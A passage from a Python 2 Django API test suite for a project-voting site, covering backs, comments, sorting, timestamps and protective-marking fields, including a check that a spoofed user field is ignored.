userB backs an project and it registers. """
# Add a 3rd user (now 1 staff, 2 users)
user_id3, api_key3 = self.add_user(email='sue@dave.com', first_name='sue', last_name='mcgrew')
self.headers3 = self.build_headers(user_id3, api_key3)
# Without the trailing slash results in 301 status_code
back_uri = self.fullURItoAbsoluteURI(self.resource_uri) + 'backs/'
# Try adding a new comment
# No user provided - picked up automatically
# Only 2 of these should go in because user 1 can't back something twice
self.c.post(back_uri, json.dumps({"comment":{"title":"cool"}}), content_type='application/json', **self.headers2)
self.c.post(back_uri, json.dumps({"comment":{"title":"fun"}}), content_type='application/json', **self.headers2)
self.c.post(back_uri, json.dumps({"comment":{"title":"nice"}}), content_type='application/json', **self.headers3)
# Now make sure there are 2 backs with different users
response = self.c.get(back_uri, **self.headers)
content = json.loads(response.content)['objects']
self.assertEquals(len(content), 2)
self.assertEquals(content[0]['user'], self.user_id2.username)
self.assertEquals(content[1]['user'], user_id3.username)
# Make sure the back count is correct
response = self.c.get(self.resource_uri, **self.headers)
self.assertEquals(json.loads(response.content)['objects'][0]['back_count'], 2)
def test_user_backs_project_and_then_revokes_by_delete(self):
""" userA backS an project. UserA tries to back it instead - it should SUCCEED. """
# back
back_uri = self.fullURItoAbsoluteURI(self.resource_uri) + 'backs/'
self.c.post(back_uri, json.dumps({"comment":{"title":"cool"}}), content_type='application/json', **self.headers)
# Check it registered
response = self.c.get(back_uri, **self.headers)
content = json.loads(response.content)['objects']
self.assertEquals(len(content), 1)
back_exact_uri = content[0]['resource_uri']
# Delete the backing
response = self.c.delete(back_exact_uri, **self.headers)
self.assertEquals(response.status_code, 204)
# Make sure it got dropped
response = self.c.get(back_uri, **self.headers)
content = json.loads(response.content)['objects']
self.assertEquals(len(content), 0)
def test_back_comment_stored_in_comments_model(self):
""" Check that a Back comment gets stored in the comments model, not as a vote subdoc """
# Without the trailing slash results in 301 status_code
backs_uri = self.fullURItoAbsoluteURI(self.resource_uri) + 'backs/'
comments_uri = self.fullURItoAbsoluteURI(self.resource_uri) + 'comments/'
new_comment = {"comment" : {"title" : "heres a new comment",
"body" : "heres the body of a new comment",
"protective_marking" : {"classification" : "PUBLIC",
"classification_short" : "PU",
"classification_rank" : 0,
"national_caveats_primary_name" : '',
"national_caveats_members" : [],
"codewords" : ['BANANA 1', 'BANANA 2'],
"codewords_short" : ['B1', 'B2'],
"descriptor" : 'PRIVATE'}
}
}
# Try adding a new backing with comment
self.c.post(backs_uri, json.dumps(new_comment), content_type='application/json', **self.headers)
# Now make sure there are 2 backs with different users
response = self.c.get(comments_uri, **self.headers)
content = json.loads(response.content)['objects']
self.assertEquals(content[0]['user'], self.user.username)
response = self.c.get(self.fullURItoAbsoluteURI(self.resource_uri), **self.headers)
# ['objects'][0] - because detail level has a meta object
doc = json.loads(response.content)['objects'][0]
self.assertEquals(len(doc['comments']), 1)
self.assertEquals(doc['comment_count'], 1)
self.assertEquals(doc['comments'][0]['type'], 'back')
self.assertEquals(len(doc['backs']), 1)
self.assertEquals(doc['back_count'], 1)
def test_attempted_back_spoof_fake_user(self):
""" Mimics someone attemtpting to increment back by submitting a fake user """
# The user that is recorded in the db isn't fake_back@xyz.com
backs_uri = self.fullURItoAbsoluteURI(self.resource_uri) + 'backs/'
fake_data = {'user':'fake_back@xyz.com'}
self.c.post(backs_uri, json.dumps(fake_data), content_type='application/json', **self.headers)
# Now make sure there are 2 backs with different users
response = self.c.get(backs_uri, **self.headers)
self.assertEquals(json.loads(response.content)['objects'][0]['user'], self.user.username)
def test_get_user_vote_status_back(self):
""" Check that the API returns the user_backed field """
uri = self.fullURItoAbsoluteURI(self.resource_uri) + 'backs/'
self.c.post(uri, json.dumps({}), content_type='application/json', **self.headers)
# Check the user vote is the correct value
response = self.c.get(self.resource_uri, **self.headers)
self.assertEquals(json.loads(response.content)['objects'][0]['user_backed'], 1)
def test_get_user_vote_status_not_backed(self):
""" Check that the API returns the user_backed field """
# Check the user vote is the correct value
response = self.c.get(self.fullURItoAbsoluteURI(self.resource_uri), **self.headers)
self.assertEquals(json.loads(response.content)['objects'][0]['user_backed'], 0)
def test_user_vote_issue45_case1(self):
"""
Re-creating this action on the front-end
-----------------------------------------
UserA logs in - not actually required in the tests (API auth)
UserA votes on (backs) project_001
Check user_voted for project_001 - should be +1
UserA logs out
UserB logs in - not actually required in the tests (API auth)
UserB opens project_001
Check user_voted for project_001 - should be 0
UserB votes on (backs) project_001
Check user_voted for project_001 - should be -1
"""
# Create UserA
userA, userA_api_key = self.add_user(email="a@a.com", first_name="a", last_name="user_a")
userA_headers = self.build_headers(userA, userA_api_key)
# UserA backs an project
uri = self.fullURItoAbsoluteURI(self.resource_uri) + 'backs/'
x = self.c.post(uri, json.dumps({}), content_type='application/json', **userA_headers)
# Check the user_backed is correct
response = self.c.get(self.fullURItoAbsoluteURI(self.resource_uri), **userA_headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['user_backed'], 1)
# Create UserB
userB, userB_api_key = self.add_user(email="b@b.com", first_name="b", last_name="user_b")
userB_headers = self.build_headers(userB, userB_api_key)
# UserB shouldn't have a user_vote yet
response = self.c.get(self.fullURItoAbsoluteURI(self.resource_uri), **userB_headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['user_backed'], 0)
# UserB backs something
uri = self.fullURItoAbsoluteURI(self.resource_uri) + 'backs/'
x = self.c.post(uri, json.dumps({}), content_type='application/json', **userB_headers)
# UserB now has a user_vote of -1
response = self.c.get(self.fullURItoAbsoluteURI(self.resource_uri), **userB_headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['user_backed'], 1)
def test_user_vote_issue45_case2(self):
""" UserA logs in
UserA votes on (backs) project_001
Check user_voted for project_001 - should be +1
UserA logs out
Anonymous opens project_001
Check user_voted for project_001 - should be 0
UserB logs in - not actually required in the tests (API auth)
UserB opens project_001
Check user_voted for project_001 - should be 0
UserB votes on (backs) project_001
Check user_voted for project_001 - should be -1
"""
# Create UserA
userA, userA_api_key = self.add_user(email="a@a.com", first_name="a", last_name="user_a")
userA_headers = self.build_headers(userA, userA_api_key)
# UserA backs an project
uri = self.fullURItoAbsoluteURI(self.resource_uri) + 'backs/'
x = self.c.post(uri, json.dumps({}), content_type='application/json', **userA_headers)
# Check the user_backed is correct
response = self.c.get(self.fullURItoAbsoluteURI(self.resource_uri), **userA_headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['user_backed'], 1)
# AnonymousUser shouldn't have a user_backed yet
response = self.c.get(self.fullURItoAbsoluteURI(self.resource_uri))
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['user_backed'], 0)
# And now UserB just to be sure...
userB, userB_api_key = self.add_user(email="b@b.com", first_name="b", last_name="user_b")
userB_headers = self.build_headers(userB, userB_api_key)
# UserB shouldn't have a user_vote yet
response = self.c.get(self.fullURItoAbsoluteURI(self.resource_uri), **userB_headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['user_backed'], 0)
# UserB backs something
uri = self.fullURItoAbsoluteURI(self.resource_uri) + 'backs/'
x = self.c.post(uri, json.dumps({}), content_type='application/json', **userB_headers)
# UserB now has a user_vote of 0
response = self.c.get(self.fullURItoAbsoluteURI(self.resource_uri), **userB_headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['user_backed'], 1)
#===============================================================================
# DIFFERENT WAYS OF QUERYING THE COMMENTS API - by user? by title?
#===============================================================================
#===============================================================================
#TODO: Check that a null classification can be posted- for when we drop that.
#===============================================================================
#@utils.override_settings(DEBUG=True)
class Test_Project_Sorting(Test_Authentication_Base):
def setUp(self):
""" Add in some documents"""
# Add a user and gain access to the API key and user
self.user_id, self.api_key = self.add_user("staff_user1@projects.com")
self.user = self.give_privileges(self.user_id, priv='staff')
self.headers = self.build_headers(self.user_id, self.api_key)
self.doc_ids = []
# Insert 10 docs with different months
for i in range(10):
doc = {"title": "Project #%s"%(i), "status":"published", "description": "First project description in here."}
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
if response.status_code == 201:
self.doc_ids.append(response['location'])
# Check they went in OK
content = json.loads(self.c.get(self.resourceListURI('project'), **self.headers).content)
self.assertEquals(len(content['objects']), 10)
def test_doc_asc_created_sort(self):
"""Sort results by date in asc order """
response = self.c.get('/api/v1/project/?order_by=created', **self.headers)
meta, objects = self.get_meta_and_objects(response)
for i in range(1, len(objects)):
this = datetime.datetime.strptime(objects[i]['created'], '%Y-%m-%dT%H:%M:%S.%f')
prev = datetime.datetime.strptime(objects[i-1]['created'], '%Y-%m-%dT%H:%M:%S.%f')
self.assertTrue(prev < this)
def test_doc_desc_created_sort(self):
""" Sort results by date in descending order. """
response = self.c.get('/api/v1/project/?order_by=-created', **self.headers)
meta, objects = self.get_meta_and_objects(response)
for i in range(1, len(objects)):
this = datetime.datetime.strptime(objects[i]['created'], '%Y-%m-%dT%H:%M:%S.%f')
prev = datetime.datetime.strptime(objects[i-1]['created'], '%Y-%m-%dT%H:%M:%S.%f')
self.assertTrue(prev > this)
def test_doc_back_count_sort_desc(self):
""" Sort results by back count in descending order. """
# Add some backs
for i in range(len(self.doc_ids)-1):
backs_uri = self.fullURItoAbsoluteURI(self.doc_ids[i]) + 'backs/'
# Add a different number of backs for each project
x = i + 1
for j in range(1, x+2):
# Add a different user each time
user_id, api_key = self.add_user(email='%s@blah.com'%(j))
headers = self.build_headers(user_id, api_key)
try:
resp = self.c.post(backs_uri, json.dumps({'comment':{"title":'cool %s'%(j)}}), content_type='application/json', **headers)
except Exception, e:
print e
response = self.c.get('/api/v1/project/?order_by=back_count', **self.headers)
meta, objects = self.get_meta_and_objects(response)
for x in range(len(objects)-1):
this_back_count = objects[x]['back_count']
next_back_count = objects[x+1]['back_count']
if this_back_count and next_back_count:
self.assertGreater(next_back_count, this_back_count)
## MORE TESTS FOR DIFFERENT SORT FIELDS ##
#@utils.override_settings(DEBUG=True)
class Test_Check_Modified(Test_Authentication_Base):
def setUp(self):
""" Add in some documents"""
# Add a user and gain access to the API key and user
self.user_id, self.api_key = self.add_user("staff_user1@projects.com")
user = self.give_privileges(self.user_id, priv='staff')
self.headers = self.build_headers(self.user_id, self.api_key)
number_projects = 3
# Insert 10 docs with different months
for i in range(number_projects):
doc = {"title": "Project #%s"%(i), "description": "First project description in here.", "status": "published"}
#resp = self.c.get(self.resourceListURI('project'), **self.headers)
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
main_project = response['location']
self.assertEquals(response.status_code, 201)
comments_uri = self.fullURItoAbsoluteURI(main_project) + 'comments/'
# Try adding new comments
for j in range (3):
new_comment = {"user" : "rich@rich.com",
"body" : "#%s perhaps we could extend that project by..."%(j),
"title" : "and what about adding to that project with %s..."%(j),
"protective_marking" : {"classification":"unclassified","descriptor":""}}
resp = self.c.post(comments_uri, json.dumps(new_comment), content_type='application/json', **self.headers)
self.assertEquals(resp.status_code, 201)
# Wait to ensure we have a different time
time.sleep(0.5)
# Check they went in OK
content = json.loads(self.c.get(self.resourceListURI('project'), **self.headers).content)
self.assertEquals(len(content['objects']), number_projects)
def retrieve_most_recent_timestamp(self, objects):
"""Gets the most recent timestamp"""
dates = []
for obj in objects:
dates += [datetime.datetime.strptime(obj['created'], '%Y-%m-%dT%H:%M:%S.%f'), datetime.datetime.strptime(obj['modified'], '%Y-%m-%dT%H:%M:%S.%f')]
return max(dates)
def test_update_project_modified_ts_field_on_POST(self):
""" Checks that the Project API updates the modified timestamp field when part of the project is changed"""
# Get all data
content = json.loads(self.c.get(self.resourceListURI('project'), **self.headers).content)
project_0 = content['objects'][0]
old_title = project_0['title']
old_ts = project_0['modified']
# Patch a new title - partial addition which leaves the rest in place correctly.
new_title = {"title":"this is a major change to the title because it was offensive..."}
response = self.c.patch(self.fullURItoAbsoluteURI(project_0['resource_uri']), json.dumps(new_title), content_type='application/json', **self.headers)
content = json.loads(self.c.get(self.resourceListURI('project'), **self.headers).content)
# Retrieve the last project in the set now because it's been moved
project_0 = content['objects'][0]
new_stored_title = project_0['title']
# Check its not the same as the previous one and is the intended new one
self.assertNotEqual(old_title, new_stored_title)
self.assertEqual(new_title['title'], new_stored_title)
# Check the timestamps
new_ts = project_0['modified']
self.assertGreater(new_ts, old_ts)
def test_update_project_modified_ts_field_on_POST_to_comment(self):
""" Checks that the Project API updates the modified timestamp field when part of the project is changed.
Mods to the comments/backs will change the overall objects modified date."""
# Get all data
content = json.loads(self.c.get(self.resourceListURI('project'), **self.headers).content)
project_x = content['objects'][-1]
project_old_ts = project_x['modified']
first_comment = project_x['comments'][0]
# Patch a new title - partial addition which leaves the rest in place correctly.
new_comment_title = {"title":"this is a major change to the title because it was offensive..."}
response = self.c.patch(first_comment['resource_uri'], json.dumps(new_comment_title), content_type='application/json', **self.headers)
time.sleep(1)
# After a short sleep, get the projects again
content = json.loads(self.c.get(self.resourceListURI('project'), **self.headers).content)
project_x = content['objects'][-1]
# Get the modified time for the Project
project_new_ts = project_x['modified']
# Get the first comment again
new_first_comment = project_x['comments'][0]
# Check that the new first comment title is what we tried to change it to
self.assertEqual(new_first_comment['title'], new_comment_title['title'])
# Check that the project modified ts has changes.
self.assertGreater(project_new_ts, project_old_ts)
def test_check_project_modified_is_correct(self):
"""Checks that the project level modified is correct """
response = self.c.get('/api/v1/project/', **self.headers)
meta, objects = self.get_meta_and_objects(response)
for project in objects:
most_recent_comment = self.retrieve_most_recent_timestamp(project['comments'])
self.assertEquals(most_recent_comment.strftime('%Y-%m-%dT%H:%M:%S'),
datetime.datetime.strptime(project['modified'], '%Y-%m-%dT%H:%M:%S.%f').strftime('%Y-%m-%dT%H:%M:%S'))
def test_check_meta_modified_is_correct(self):
"""Checks that the meta-level modified is correct """
response = self.c.get('/api/v1/project/', **self.headers)
meta, objects = self.get_meta_and_objects(response)
most_recent_project = self.retrieve_most_recent_timestamp(objects)
most_recent_comment = datetime.datetime.utcnow() - datetime.timedelta(days=1000)
for project in objects:
most_recent_comment = max([self.retrieve_most_recent_timestamp(project['comments']), most_recent_comment])
most_recent = max([most_recent_project, most_recent_comment])
self.assertEquals(most_recent, datetime.datetime.strptime(meta['modified'], '%Y-%m-%dT%H:%M:%S.%f'))
def test_update_project_tag_count(self):
""" Check that the tag count changes if its edited."""
# Get all data
content = json.loads(self.c.get(self.resourceListURI('project'), **self.headers).content)
project_0 = content['objects'][0]
old_tags = project_0['tags']
old_tag_count = project_0['tag_count']
self.assertEquals(old_tag_count, 0)
# Patch some tags in, having forgotten them first time round
add_tags = {"tags" : ["physics","maths","geography","sports","english"]}
response = self.c.patch(self.fullURItoAbsoluteURI(project_0['resource_uri']), json.dumps(add_tags), content_type='application/json', **self.headers)
content = json.loads(self.c.get(self.resourceListURI('project'), **self.headers).content)
# Retrieve the project
project_0 = content['objects'][0]
new_tags = project_0['tags']
new_tag_count = project_0['tag_count']
# Check its not the same as the previous one and is the intended new one
self.assertNotEqual(old_tags, new_tags)
self.assertEqual(new_tag_count, 5)
#@utils.override_settings(DEBUG=True)
class Test_Data_Level_Responses(Test_Authentication_Base):
def setUp(self):
""" Add in some documents"""
# Add a user and gain access to the API key and user
self.user_id, self.api_key = self.add_user("staff_user1@projects.com")
user = self.give_privileges(self.user_id, priv='staff')
self.headers = self.build_headers(self.user_id, self.api_key)
# Insert 10 docs with different months
for i in range(3):
doc = {"title": "Project #%s"%(i),"status":"published", "description": "First project description in here."}
# Just to check its there?
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
main_project = response['location']
comments_uri = self.fullURItoAbsoluteURI(main_project) + 'comments/'
# Try adding new comments
for j in range (5):
new_comment = {"user" : "rich@rich.com",
"body" : "#%s perhaps we could extend that project by..."%(j),
"title" : "and what about adding to that project with %s..."%(j),
"protective_marking" : {"classification":"unclassified","descriptor":""}}
# Just to check its there?
self.c.post(comments_uri, json.dumps(new_comment), content_type='application/json', **self.headers)
backs_uri = self.fullURItoAbsoluteURI(main_project) + 'backs/'
new_backs = {"user" : "dave@dave.com",
"comment" : {"title":"this is one of the worst projects ever - someone else tried this and it failed."}}
response = self.c.post(backs_uri, json.dumps(new_backs), content_type='application/json', **self.headers)
# Check they went in OK
content = json.loads(self.c.get(self.resourceListURI('project'), **self.headers).content)
def test_response_data_test_set_list(self):
"""Check that we get back the expected set of fields"""
response = self.c.get('/api/v1/project/?data_level=proj_test', **self.headers)
meta, data = self.get_meta_and_objects(response)
data_response_keys = data[0].keys()
for fld in settings.RESPONSE_FIELDS['proj_test']:
self.assertTrue(fld in data_response_keys)
def test_response_data_test_set_meta(self):
"""Check that we get back the expected set of fields"""
response = self.c.get('/api/v1/project/?data_level=meta', **self.headers)
content = json.loads(response.content)
self.assertFalse(content.has_key('data'))
self.assertTrue(content.has_key('meta'))
def test_response_data_check_comments_modified(self):
"""Is there a meta.modified for a /project/<id>/comments/ call?"""
response = self.c.get('/api/v1/project/?data_level=meta', **self.headers)
content = json.loads(response.content)
self.assertTrue(content.has_key('meta'))
self.assertTrue(content['meta']['modified'])
#@utils.override_settings(DEBUG=True)
class Test_Contributor_Naming(Test_Authentication_Base):
def setUp(self):
""" Add in some documents"""
# Add a user and gain access to the API key and user
self.user_id, self.api_key = self.add_user("staff_user1@projects.com")
user = self.give_privileges(self.user_id, priv='staff')
self.headers = self.build_headers(self.user_id, self.api_key)
# We need another user for comments
user_id2, api_key2 = self.add_user(email='dave@davison.com', first_name='dave', last_name='davidson')
self.headers2 = self.build_headers(user_id2, api_key2)
# We also need a 3rd user because of the unique constraint (applied in code logic) on backs fields
user_id3, api_key3 = self.add_user(email='john@cleese.com', first_name='john', last_name='cleese')
self.headers3 = self.build_headers(user_id3, api_key3)
# Insert 10 docs with different months
for i in range(3):
doc = {"title": "Project #%s"%(i), "description": "First project description in here.", "status": "published"}
# Just to check its there?
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
main_project = response['location']
comments_uri = self.fullURItoAbsoluteURI(main_project) + 'comments/'
# Try adding new comments
for j in range (5):
new_comment = {"body" : "#%s perhaps we could extend that project by..."%(j),
"title" : "and what about adding to that project with %s..."%(j),
"protective_marking" : {"classification":"unclassified","descriptor":""}}
# Just to check its there?
self.c.post(comments_uri, json.dumps(new_comment), content_type='application/json', **self.headers2)
backs_uri = self.fullURItoAbsoluteURI(main_project) + 'backs/'
response = self.c.post(backs_uri, json.dumps({}), content_type='application/json', **self.headers3)
def test_project_contributor_name(self):
""" Check the project has a contribtor name """
response = self.c.get(self.resourceListURI('project'), **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['contributor_name'], 'Bob Roberts')
def test_comment_contributor_name(self):
""" Check the comment has a contribtor name """
response = self.c.get(self.resourceListURI('project'), **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['comments'][0]['contributor_name'], 'Dave Davidson')
def test_backs_contributor_name(self):
""" Check the backs has a contribtor name """
response = self.c.get(self.resourceListURI('project'), **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['backs'][0]['contributor_name'], 'John Cleese')
#@utils.override_settings(DEBUG=True)
class Test_Project_With_Protective_Markings(Test_Authentication_Base):
def setUp(self):
""" Add in some documents"""
# Add a user and gain access to the API key and user
self.user_id, self.api_key = self.add_user("staff_user1@projects.com")
user = self.give_privileges(self.user_id, priv='staff')
self.headers = self.build_headers(self.user_id, self.api_key)
def test_submit_full_pm(self):
""" Submit a complete protective marking """
doc = {"title": "Project #1",
"description": "First project description in here.",
"status" : "published",
"protective_marking" : {"classification" : "PUBLIC",
"classification_short" : "PU",
"classification_rank" : 0,
"national_caveats_primary_name" : 'ME ONLY',
"national_caveats_members" : [],
"codewords" : ['BANANA 1', 'BANANA 2'],
"codewords_short" : ['B1', 'B2'],
"descriptor" : 'PRIVATE'}
}
# Just to check its there?
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEquals(response.status_code, 201)
response = self.c.get(self.resourceListURI('project'))
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['protective_marking']['classification'], 'PUBLIC')
self.assertEquals(objects[0]['protective_marking']['pretty_pm'], 'PUBLIC [PRIVATE] BANANA 1/BANANA 2 ME ONLY')
# Check that it also comes out in the project-level content
self.assertEquals(objects[0]['pretty_pm'], 'PUBLIC [PRIVATE] BANANA 1/BANANA 2 ME ONLY')
def test_submit_classification(self):
""" Submit a classification """
doc = {"title": "Project #1",
"description": "First project description in here.",
"status": "published",
"protective_marking" : {"classification" : "PUBLIC",
"classification_short" : "PU",
"classification_rank" : 0,
}
}
# Just to check its there?
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEquals(response.status_code, 201)
response = self.c.get(self.resourceListURI('project'))
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['protective_marking']['classification'], 'PUBLIC')
self.assertEquals(objects[0]['protective_marking']['pretty_pm'], 'PUBLIC')
def test_submit_national_caveats(self):
""" Submit a national caveat """
doc = {"title": "Project #1",
"description": "First project description in here.",
"status":"published",
"protective_marking" : {"national_caveats_primary_name" : 'ME ONLY',
"national_caveats_members" : ['1', '2', '3'],
}
}
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEquals(response.status_code, 201)
response = self.c.get(self.resourceListURI('project'))
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['protective_marking']['national_caveats_primary_name'], 'ME ONLY')
self.assertEquals(objects[0]['protective_marking']['national_caveats_members'], ['1','2','3'])
self.assertEquals(objects[0]['protective_marking']['pretty_pm'], 'CLASSIFICATION NOT KNOWN ME ONLY')
def test_submit_codewords(self):
""" Submit a codeword """
doc = {"title": "Project #1",
"description": "First project description in here.",
"status":"published",
"protective_marking" : {"codewords" : ['BANANA 1', 'BANANA 2'],
"codewords_short" : ['B1', 'B2']}
}
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEquals(response.status_code, 201)
response = self.c.get(self.resourceListURI('project'))
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['protective_marking']['codewords'], ['BANANA 1', 'BANANA 2'])
self.assertEquals(objects[0]['protective_marking']['codewords_short'], ['B1', 'B2'])
self.assertEquals(objects[0]['protective_marking']['pretty_pm'], 'CLASSIFICATION NOT KNOWN BANANA 1/BANANA 2')
def test_submit_descriptors(self):
""" Submit descriptors """
doc = {"title": "Project #1",
"description": "First project description in here.",
"status":"published",
"protective_marking" : {"descriptor" : 'PRIVATE'}
}
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEquals(response.status_code, 201)
response = self.c.get(self.resourceListURI('project'))
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['protective_marking']['descriptor'], 'PRIVATE')
self.assertEquals(objects[0]['protective_marking']['pretty_pm'], 'CLASSIFICATION NOT KNOWN [PRIVATE]')
#@utils.override_settings(DEBUG=True)
class Test_Get_All_PMs(TestCase):
def setUp(self):
self.sample_pms = [{'classification':'public','classification_short':'PU'},
{'classification':'group','classification_short':'GR'},
{'classification':'private','classification_short':'PR'},
{'classification':'personal','classification_short':'PE'}]
# Build up a PM
self.pm = documents.ProtectiveMarking(classification='PUBLIC',
classification_short='PU',
classification_rank=0,
descriptor='BUSINESS',
codewords=['THIS','THAT'],
codewords_short=['T1','T2'],
national_caveats_primary_name='ME ONLY',
national_caveats_members=['1','2','3'],
national_caveats_rank=2)
#===============================================================================
#
# COMMENTED BECAUSE I CAN'T WORK OUT HOW TO BUILD A BUNDLE INSIDE A TEST
#
# def test_get_pm_from_top_level_only(self):
# """Retrieves pms from a set of objects."""
#
# docs = []
# for i in range(4):
#
# new_pm = copy.deepcopy(self.pm)
# new_pm['classification'] = self.sample_pms[i]['classification']
# new_pm['classification_short'] = self.sample_pms[i]['classification_short']
#
# doc = documents.Project(title ='new project', protective_marking = new_pm)
# #print doc.to_json()
#
# docs.append(doc)
#
# pm_list = api.get_all_pms(docs)
#
# self.assertEquals(len(pm_list), 4)
#
#
# def test_get_pm_from_top_level_and_nested(self):
# """Retrieves pms from a set of objects and sub objects."""
#
# docs = []
#
# for i in range(4):
#
# new_pm = copy.deepcopy(self.pm)
# new_pm['classification'] = self.sample_pms[i]['classification']
# new_pm['classification_short'] = self.sample_pms[i]['classification_short']
#
# # Loop and create some comments
# comments = [documents.Comment(title='new comment', body='great project', protective_marking=new_pm) for i in range(3)]
#
# # Create the document
# doc = documents.Project(title ='new project',
# comments=comments,
# protective_marking=new_pm)
# docs.append(doc)
#
# pm_list = api.get_all_pms(docs)
#
# self.assertEquals(len(pm_list), 16)
#
#===============================================================================
def test_get_max_pm_inject_O(self):
"""Retrieves the max pm"""
pm_list = []
for i in range(3):
pm = copy.deepcopy(self.pm)
pm_list.append(pm)
max_pm = api.get_max_pm(pm_list)
self.assertEquals(max_pm['classification'], 'PUBLIC')
def test_get_max_pm_inject_S(self):
"""Retrieves the max pm"""
pm_list = []
for i in range(3):
pm = copy.deepcopy(self.pm)
pm_list.append(pm)
pm_list[0]['classification']='PRIVATE'
pm_list[0]['classification_short']='PR'
pm_list[0]['classification_rank']=2
max_pm = api.get_max_pm(pm_list)
self.assertEquals(max_pm['classification'], 'PRIVATE')
def test_get_max_pm_inject_TS(self):
"""Retrieves the max pm"""
pm_list = []
for i in range(3):
pm = copy.deepcopy(self.pm)
pm_list.append(pm)
pm_list[0]['classification']='PRIVATE'
pm_list[0]['classification_short']='PR'
pm_list[0]['classification_rank']=2
pm_list[0]['classification']='PERSONAL'
pm_list[0]['classification_short']='PE'
pm_list[0]['classification_rank']=3
max_pm = api.get_max_pm(pm_list)
self.assertEquals(max_pm['classification'], 'PERSONAL')
def test_get_max_pm_nat_cavs(self):
"""Retrieves the max pm - check national cavs"""
pm_list = []
for i in range(3):
pm = copy.deepcopy(self.pm)
pm_list.append(pm)
pm_list[0]['national_caveats_primary_name']='HIM ONLY'
pm_list[0]['national_caveats_members']= ['1','2']
pm_list[0]['national_caveats_rank']=3
max_pm = api.get_max_pm(pm_list)
self.assertEquals(max_pm['national_caveats_primary_name'], 'HIM ONLY')
self.assertEquals(max_pm['national_caveats_members'], ['1','2'])
self.assertEquals(max_pm['national_caveats_rank'], 3)
def test_get_max_pm_multiple_descriptors(self):
"""Retrieves the max pm"""
descriptors=['LOCSEN','PRIVATE','PERSONAL']
pm_list = []
for i in range(3):
pm = copy.deepcopy(self.pm)
pm['descriptor']=descriptors[i]
pm_list.append(pm)
max_pm = api.get_max_pm(pm_list)
self.assertEquals(max_pm['descriptor'], 'LOCSEN,PRIVATE,PERSONAL')
def test_get_max_pm_multiple_codewords(self):
"""Retrieves the max pm"""
codewords=['BANANA1','BANANA2','BANANA3']
pm_list = []
for i in range(3):
pm = copy.deepcopy(self.pm)
pm['codewords']=[codewords[i]]
pm_list.append(pm)
max_pm = api.get_max_pm(pm_list)
self.assertEquals(sorted(max_pm['codewords']), sorted(codewords))
#@utils.override_settings(DEBUG=True)
class Test_Max_PM_in_Meta(Test_Authentication_Base):
def setUp(self):
""" Add in some documents"""
# Add a user and gain access to the API key and user
self.user_id, self.api_key = self.add_user("staff_user1@projects.com")
user = self.give_privileges(self.user_id, priv='staff')
self.headers = self.build_headers(self.user_id, self.api_key)
# We need another user for comments
user_id2, api_key2 = self.add_user(email='dave@davison.com', first_name='dave', last_name='davidson')
self.headers2 = self.build_headers(user_id2, api_key2)
# We also need a 3rd user because of the unique constraint (applied in code logic) on backs fields
user_id3, api_key3 = self.add_user(email='john@cleese.com', first_name='john', last_name='cleese')
self.headers3 = self.build_headers(user_id3, api_key3)
self.pm = {'classification':'PUBLIC',
'classification_short':'O',
'classification_rank':0,
'descriptor':'PRIVATE',
'codewords':['THIS','THAT'],
'codewords_short':['T1','T2'],
'national_caveats_primary_name':'ME ONLY',
'national_caveats_members':['1','2','3'],
'national_caveats_rank':2
}
def test_just_project_level_O(self):
""" just pms in the projects - all at O to overcome a bug where PUBLIC wasn't rendering a max pm."""
doc = {"title": "Project #1",
"description": "First project description in here.",
"status":"published",
'protective_marking' : self.pm}
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEquals(response.status_code, 201)
response = self.c.get(self.resourceListURI('project'))
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(meta['max_pm']['classification'], 'PUBLIC')
def test_just_project_level(self):
""" just pms in the projects """
# Insert a couple of documents
doc = {"title": "Project #1", "description": "First project description in here.", 'protective_marking' : self.pm, "status":"published"}
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEquals(response.status_code, 201)
doc = {"title": "Project #2", "description": "First project description in here.", 'protective_marking' : self.pm, "status":"published"}
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEquals(response.status_code, 201)
# Bump the classification on the final one
doc['protective_marking']['classification'] = 'PRIVATE'
doc['protective_marking']['classification_short'] = 'PR'
doc['protective_marking']['classification_rank'] = 2
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEquals(response.status_code, 201)
response = self.c.get(self.resourceListURI('project'))
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(meta['max_pm']['classification'], 'PRIVATE')
def test_include_embedded_level(self):
""" PMs inside the embedded level too """
# Insert a couple of documents
doc = {"title": "Project #1", "description": "First project description in here.", 'protective_marking' : self.pm, "status": "published"}
